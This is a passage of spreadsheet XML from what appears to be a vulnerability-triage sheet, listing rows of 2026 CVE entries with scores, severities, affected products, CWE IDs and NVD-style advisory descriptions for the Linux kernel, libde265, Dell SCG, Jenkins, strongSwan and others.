      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89707</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: release path refs on follow_down() error
nfsd_cross_mnt() initializes a local struct path with mntget() and
dget() before calling follow_down(). On a negative return the error
arm jumps to out without releasing those references:
    err = follow_down(&amp;path, follow_flags);
    if (err &lt; 0)
            goto out;
follow_down() never drops the caller's entry-time refs on any error
sub-case; for example a pre-cross d_manage() failure leaves path
untouched, so the mntget()/dget() taken on entry survive the call.
Every other early-exit arm in nfsd_cross_mnt() (other-namespace
return, IS_ERR(exp2), and the success tail after the swap) already
calls path_put(&amp;path); the err &lt; 0 arm is the lone omission. The
leak inflates mnt_count and d_count on each failed cross-mount,
blocking umount and pinning dentries against the shrinker, and is
reachable by any authenticated NFS client through nfsd_lookup_dentry
or the NFSv4 READDIR encode path.
Fix by calling path_put(&amp;path) before the goto out in the err &lt; 0
arm so the entry-time refs are released on all follow_down() error
returns.</t>
        </is>
      </c>
      <c r="S509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89707</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54240</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>libde265 is an open source implementation of the h.265 video codec. Versions prior to 1.1.1 use signed 32-bit arithmetic to calculate pixel offsets, allowing a crafted HEVC stream with large image dimensions to trigger an integer overflow and cause out-of-bounds heap reads or writes, potentially disclosing data, corrupting memory, or crashing the decoder. Version 1.1.1 contains a patch.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54240</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54241</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>libde265 is an open source implementation of the h.265 video codec. Versions prior to 1.1.1 use signed 32-bit arithmetic to calculate the sample adaptive offset input-buffer size, allowing a crafted HEVC stream with large dimensions and 16-bit luma samples to cause an integer overflow, an undersized allocation, and an out-of-bounds heap read that may expose heap data in decoded output or crash the decoder. Version 1.1.1 contains a patch.</t>
        </is>
      </c>
      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54241</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78492</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R513"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13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78492</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78494</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R514"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14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78494</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79644</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R515"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15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79644</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79963</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79963</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86166</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Tenda HG10 300001138. This issue affects the function formWanRedirect of the file /boaform/formWanRedirect of the component Boa Web Server. Executing a manipulation of the argument if can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86166</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89157</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_pattern_convert out-of-bounds write when an attacker can provide a large pattern.</t>
        </is>
      </c>
      <c r="S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89157</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89769</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clocksource/drivers/nxp-pit: Fix IRQ leak on cpuhp_setup_state error path
When cpuhp_setup_state fails after pit_clockevent_per_cpu_init has
successfully called request_irq, the error handling jumps directly to
out_pit_clocksource_unregister without freeing the registered IRQ.
This leaks the IRQ line and, since kfree(pit) follows, leaves a
dangling pointer registered as the interrupt handler's dev_id,
potentially leading to a use-after-free if the IRQ fires afterwards.
Fix it by calling pit_clockevent_per_cpu_exit to properly release the
IRQ before falling through to the existing cleanup chain.</t>
        </is>
      </c>
      <c r="S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89769</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15679</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>5bcc34ac-0282-4e8a-96fc-046c583d3048</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr">
        <is>
          <t>CWE-258</t>
        </is>
      </c>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances such as reset to factory default operation, the BMC root account is made active without a password on BullSequana XH3406 and XH3515.</t>
        </is>
      </c>
      <c r="S520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15679</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57842</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>NetBSD contains a use-after-free and double-free vulnerability in msg_recv_copyin() within the COMPAT_NETBSD32 compatibility layer due to a missing return statement before the cleanup label on the success path. Any local user able to execute a 32-bit binary on a 64-bit NetBSD system can trigger a kernel panic or memory corruption by calling recvmsg() with msg_iovlen between 9 and IOV_MAX, causing the kernel to access a freed iovec buffer and subsequently free the same allocation a second time.</t>
        </is>
      </c>
      <c r="S521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57842</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78135</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 5.9.7 through 6.0.7 mishandles behavioral workflow in the IKEv2 state machine. Because CREATE_CHILD_SA requests are mishandled, there can be an authentication bypass.</t>
        </is>
      </c>
      <c r="S522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78135</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84652</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K523" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, Jenkins does not rotate the session when a user is authenticated via the "remember me" cookie, allowing attackers able to serve content on the same site as Jenkins to set a known session cookie in the victim's browser, which after the victim authenticates via the "remember me" cookie, grants the attacker access to Jenkins as that user.</t>
        </is>
      </c>
      <c r="S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84652</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89521</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/core: Handle pick_task() releasing the rq lock
Core scheduling's pick_next_task() breaks when a -&gt;pick_task()
implementation can release the rq lock. The selection state derived on entry
is only valid while the lock is held continuously. Once a pick can drop the
lock, an interleaving selection can invalidate all of it: the single-CPU
fast path can commit an uncookied pick although the core went cookied during
the release, and forceidle committed by the interleaving selection skews the
restarted pass's accounting.
Fix it by restarting the whole selection when a pick returns RETRY_TASK
after releasing the lock: a single restart point above the state derivation
replaces the per-loop restart labels, so a retry picks up state committed by
interleaving selections and accounts and resets forceidle like a fresh
selection would.
need_sync and fi_before latch across retries. Clock validity can't be
re-derived - there is no program-ordered way to tell whether the own and
core rq clocks are still updated after the lock was released, as other
lockers' pin cycles may or may not have invalidated them. When restarting,
clear core_clock_updated so that the sibling loop re-updates the core rq,
and update the own rq clock if invalidated.</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89521</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17037</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
